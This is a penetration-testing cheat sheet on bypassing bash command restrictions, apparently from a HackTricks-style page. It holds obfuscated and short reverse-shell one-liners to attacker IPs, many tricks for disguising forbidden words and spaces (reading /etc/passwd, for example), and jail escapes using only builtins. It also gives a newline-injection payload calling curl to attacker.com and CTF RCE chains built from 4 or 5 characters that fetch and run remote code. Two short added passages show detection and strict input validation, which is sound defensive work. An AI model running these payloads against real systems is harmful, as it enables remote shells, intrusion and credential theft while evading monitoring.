    # Double-Base64 is a great way to avoid bad characters like +, works 99% of the time
    echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' |base64|base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" |sed 's/ /${IFS}/g'
    # echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h
Short Rev shell
    # Trick from Dikline
    # Get a rev shell with
    (sh)0>/dev/tcp/10.10.10.10/443
    # Then get the output of the rev shell by executing inside of it:
    exec >&0
Bypass Paths and forbidden words
    # Question mark binary substitution
    /usr/bin/p?ng # /usr/bin/ping
    nma? -p 80 localhost # /usr/bin/nmap -p 80 localhost

    # Wildcard(*) binary substitution
    /usr/bin/who*mi # /usr/bin/whoami

    # Wildcard + local directory arguments
    touch -- -la # -- stops processing options after the --
    ls *
    echo * # List current files and folders with echo and wildcard

    # [chars]
    /usr/bin/n[c] # /usr/bin/nc

    # Quotes
    'p'i'n'g # ping
    "w"h"o"a"m"i # whoami
    ech''o test # echo test
    ech""o test # echo test
    bas''e64 # base64

    # Backslashes
    \u\n\a\m\e \-\a # uname -a
    /\b\i\n/////s\h

    # $@
    who$@ami # whoami

    # Transformations (case, reverse, base64)
    $(tr "[A-Z]" "[a-z]"<<<"WhOaMi") # whoami -> Upper case to lower case
    $(a="WhOaMi";printf %s "${a,,}") # whoami -> transformation (only bash)
    $(rev<<<'imaohw') # whoami
    bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==) # base64

    # Execution through $0
    echo whoami|$0

    # Uninitialized variables: an uninitialized variable equals null (nothing)
    cat$u /etc$u/passwd$u # Use the uninitialized variable without {} before any symbol
    p${u}i${u}n${u}g # Equals ping, use {} to put the uninitialized variables between valid characters

    # New lines
    p\
    i\
    n\
    g # These 4 lines will equal to ping

    # Fake commands
    p$(u)i$(u)n$(u)g # Equals ping but 3 errors trying to execute "u" are shown
    w`u`h`u`o`u`a`u`m`u`i # Equals whoami but 5 errors trying to execute "u" are shown

    # Concatenation of strings using history
    !-1 # This will be substituted by the last command executed, and !-2 by the penultimate command
    mi # This will throw an error
    whoa # This will throw an error
    !-1!-2 # This will execute whoami
Bypass forbidden spaces
    # {form}
    {cat,lol.txt} # cat lol.txt
    {echo,test} # echo test

    # IFS - Internal field separator, change " " for any other character ("]" in this case)
    cat${IFS}/etc/passwd # cat /etc/passwd
    cat$IFS/etc/passwd # cat /etc/passwd

    # Put the command line in a variable and then execute it
    IFS=];b=wget]10.10.14.21:53/lol]-P]/tmp;$b
    IFS=];b=cat]/etc/passwd;$b # Using 2 ";"
    IFS=,;`cat<<<cat,/etc/passwd` # Using cat twice
    # Other way, just change each space for ${IFS}
    echo${IFS}test

    # Using hex format
    X=$'cat\x20/etc/passwd'&&$X

    # Using tabs
    echo "ls\x09-l" | bash

    # Undefined variables and !
    $u $u # This will be saved in the history and can be used as a space, please notice that the $u variable is undefined
    uname!-1\-a # This equals to uname -a
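Seen from the detection side, the word-splitting and space-replacement forms in the two sections above defeat literal string matching on command logs. The following is an added example, not part of the original page: it normalizes a logged command line and flags lines where a watched token only shows up after normalization. The `WATCH` list, the function names and the sample lines are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original page). WATCH is a hypothetical watchlist.
WATCH='base64|whoami|/etc/passwd|/dev/tcp'

# Undo the cheap lexical tricks: $IFS as a space, $@ as nothing,
# quote-splitting inside a word, and backslash-escaped letters.
normalize() {
    printf '%s\n' "$1" | sed \
        -e 's/\${IFS}/ /g' \
        -e 's/\$IFS/ /g' \
        -e 's/\$@//g' \
        -e "s/['\"]//g" \
        -e 's/\\\(.\)/\1/g' \
        -e 's/  */ /g'
}

# plain      - watched token visible in the raw line
# obfuscated - token appears only after normalization
# clean      - no watched token either way
classify() {
    norm=$(normalize "$1")
    if printf '%s\n' "$1" | grep -Eq "$WATCH"; then
        echo plain
    elif printf '%s\n' "$norm" | grep -Eq "$WATCH"; then
        echo obfuscated
    else
        echo clean
    fi
}

# Constructed command-log lines, written in the forms listed above.
while IFS= read -r line; do
    printf '%-11s %s\n' "$(classify "$line")" "$line"
done <<'EOF'
cat /etc/passwd
cat${IFS}/etc/passwd
ba''se''6''4${IFS}-''d
w"h"o"a"m"i
who$@ami
\w\h\o\a\m\i
ls -la /tmp
EOF
```

This is purely lexical: globbing, unset variables and history expansion are resolved by the shell at run time, so exec-level audit records, which log the resolved binary and its arguments, remain the more reliable source.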
Bypass backslash and slash
You can use burpcollab or pingb, for example.
Builtins
If you cannot execute external functions and only have access to a limited set of builtins to obtain RCE, there are some handy tricks to do it. Usually you won't be able to use all of the builtins, so you should know all your options to try to bypass the jail. Idea from devploit.
First of all, check all the shell builtins. Then, here are some recommendations:
    # Get list of builtins
    declare builtins

    # In these cases PATH won't be set, so you can try to set it
    PATH="/bin" /bin/ls
    export PATH="/bin"
    declare PATH="/bin"
    SHELL=/bin/bash

    # Hex
    $(echo -e "\x2f\x62\x69\x6e\x2f\x6c\x73")

    # Input
    read aaa; exec $aaa # Read more commands to execute and execute them
    read aaa; eval $aaa

    # Get "/" char using printf and env vars
    printf %.1s "$PWD"
    ## Execute /bin/ls
    $(printf %.1s "$PWD")bin$(printf %.1s "$PWD")ls
    ## To get several letters you can use a combination of printf and
    declare
    declare functions
    declare historywords

    # Read flag in current dir
    source f*
    # flag.txt:1: command not found: CTF{asdasdasd}

    # Read file with read
    while read -r line; do echo $line; done < /etc/passwd

    # Get env variables
    declare

    # Get history
    history
    declare history
    declare historywords

    # Disable special builtins chars so you can abuse them as scripts
    [ # [: ']' expected
    ## Disable "[" as builtin and enable it as script
    enable -n [
    echo -e '#!/bin/bash\necho "hello!"' > /tmp/[
    chmod +x /tmp/[
    export PATH=/tmp:$PATH
    if [ "a" ]; then echo 1; fi # Will print hello!
    # A regex that only allow letters and numbers might be vulnerable to new line characters
    1%0a`curl http://attacker.com`
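The newline case above from the validation side, as an added example that is not part of the original page: a line-oriented allow-list check (`grep`) beside a whole-string check. The function names and the sample value are constructed for illustration, and the sample stands for what an application sees after URL-decoding `%0a`.

```shell
#!/bin/sh
# Added example (not from the original page).
LC_ALL=C; export LC_ALL    # make A-Z / a-z / 0-9 ranges byte-exact

# Weak: grep matches per LINE, so ^...$ is satisfied as soon as any
# single line of the value is alphanumeric.
validate_weak() {
    printf '%s\n' "$1" | grep -Eq '^[A-Za-z0-9]+$'
}

# Strict: a case pattern is matched against the WHOLE string, newlines
# included. Reject empty input and anything outside the allow-list.
validate_strict() {
    case "$1" in
        ''|*[!A-Za-z0-9]*) return 1 ;;
        *) return 0 ;;
    esac
}

# Constructed value: a clean first line, a newline, then arbitrary text.
NL='
'
SAMPLE="1${NL}second line; not alphanumeric"

# Helper: run a validator on a value and report the outcome as a word.
verdict() { if "$1" "$2"; then echo accept; else echo reject; fi; }

echo "weak   / abc123 : $(verdict validate_weak abc123)"
echo "weak   / sample : $(verdict validate_weak "$SAMPLE")"
echo "strict / abc123 : $(verdict validate_strict abc123)"
echo "strict / sample : $(verdict validate_strict "$SAMPLE")"
```

The same pitfall exists in any regex engine run in multiline mode; anchoring on the whole input, or rejecting control characters before matching, closes it.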
Bashfuscator
    # From https://github.com/Bashfuscator/Bashfuscator
    ./bashfuscator -c 'cat /etc/passwd'
RCE with 5 chars
    # From the Orange Tsai BabyFirst Revenge challenge: https://github.com/orangetw/My-CTF-Web-Challenges#babyfirst-revenge
    # Orange Tsai solution
    ## Step 1: generate `ls -t>g` to file "_" to be able to execute ls ordering names by creation date
    http://host/?cmd=>ls\
    http://host/?cmd=ls>_
    http://host/?cmd=>\ \
    http://host/?cmd=>-t\
    http://host/?cmd=>\>g
    http://host/?cmd=ls>>_

    ## Step 2: generate `curl orange.tw|python` to file "g"
    ## by creating the necessary filenames and writing that content to file "g" executing the previous generated file
    http://host/?cmd=>on
    http://host/?cmd=>th\
    http://host/?cmd=>py\
    http://host/?cmd=>\|\
    http://host/?cmd=>tw\
    http://host/?cmd=>e.\
    http://host/?cmd=>ng\
    http://host/?cmd=>ra\
    http://host/?cmd=>o\
    http://host/?cmd=>\ \
    http://host/?cmd=>rl\
    http://host/?cmd=>cu\
    http://host/?cmd=sh _
    # Note that a "\" char is added at the end of each filename because "ls" will add a new line between filenames when writing to the file

    ## Finally execute the file "g"
    http://host/?cmd=sh g

    # Another solution from https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/
    # Instead of writing scripts to a file, create an alphabetically ordered command and execute it with "*"
    ## Execute tar command over a folder
    http://52.199.204.34/?cmd=>tar
    http://52.199.204.34/?cmd=>zcf
    http://52.199.204.34/?cmd=>zzz
    http://52.199.204.34/?cmd=*%20/h*

    # Another curiosity if you can read files of the current folder
    ln /f*
    ## If there is a file /flag.txt that will create a hard link
    ## to it in the current folder
RCE with 4 chars
    # In a similar fashion to the previous bypass this one just needs 4 chars to execute commands
    # it will follow the same principle of creating the command `ls -t>g` in a file
    # and then generate the full command in filenames
    # generate "g> ht- sl" to file "v"
    '>dir'
    '>sl'
    '>g\>'
    '>ht-'
    '*>v'

    # reverse file "v" to file "x", content "ls -th >g"
    '>rev'
    '*v>x'

    # generate "curl orange.tw|python;"
    '>\;\\'
    '>on\\'
    '>th\\'
    '>py\\'
    '>\|\\'
    '>tw\\'
    '>e.\\'
    '>ng\\'
    '>ra\\'
    '>o\\'
    '>\ \\'
    '>rl\\'
    '>cu\\'

    # got shell
    'sh x'
    'sh g'
Read-Only/Noexec/Distroless Bypass
If you are inside a filesystem with the read-only and noexec protections, or even in a distroless container, there are still ways to execute arbitrary binaries, even a shell!: